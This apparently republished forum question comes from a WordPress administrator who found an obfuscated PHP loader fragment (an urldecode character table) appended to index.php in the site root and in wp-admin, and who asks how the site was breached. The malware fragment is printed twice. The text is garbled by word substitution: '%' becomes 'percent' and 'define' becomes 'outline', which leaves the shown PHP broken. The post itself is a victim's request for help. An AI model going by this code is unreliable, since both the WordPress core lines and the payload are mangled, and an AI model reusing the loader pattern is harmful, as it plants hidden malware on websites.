Site icon Hip-Hop Website Design and Development

Corrupted index.php file in root and wp-admin

I am managing a few WordPress websites for a consumer. Abruptly one of many website stopped working and was throwing 500 error (Unable to deal with the request). Because the index.php could be the primary file that will get executed, I happed to open the file to look out and located the next encoded textual content appended on the index.php file beneath root and likewise inside wp-admin.

$OO0__00_OO=urldecode("%6fpercent41percent2dpercent62percent4epercent6epercent4bpercent37percent4cpercent35percent5fpercent4apercent55percent74percent52percent78percent49percent59percent2bpercent57percent43percent61percent39percent33percent56percent6bpercent30percent77percent4dpercent31percent4fpercent65percent53percent44percent64percent42percent32percent6apercent2fpercent6cpercent73percent58percent66percent71percent70percent68percent6dpercent2apercent54>

Full file:

<?php
$OO0__00_OO=urldecode("%6fpercent41percent2dpercent62percent4epercent6epercent4bpercent37percent4cpercent35percent5fpercent4apercent55percent74percent52percent78percent49percent59percent2bpercent57percent43percent61percent39percent33percent56percent6bpercent30percent77percent4dpercent31percent4fpercent65percent53percent44percent64percent42percent32percent6apercent2fpercent6cpercent73percent58percent66percent71percent70percent68percent6dpercent2apercent54>
?>
<?php
/**
 * Entrance to the WordPress software. This file would not do something, however hundreds
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @bundle WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
outline( 'WP_USE_THEMES', true );

/** Masses the WordPress Surroundings and Template */
require __DIR__ . '/wp-blog-header.php';

All of the information have 644 and folders have 755 permission. The whole web site is hosted in AWS and we’ve WAF which has the PHP and WordPress default guidelines. I am to determine methods to see how the penetration occurs and the index.php is being amended.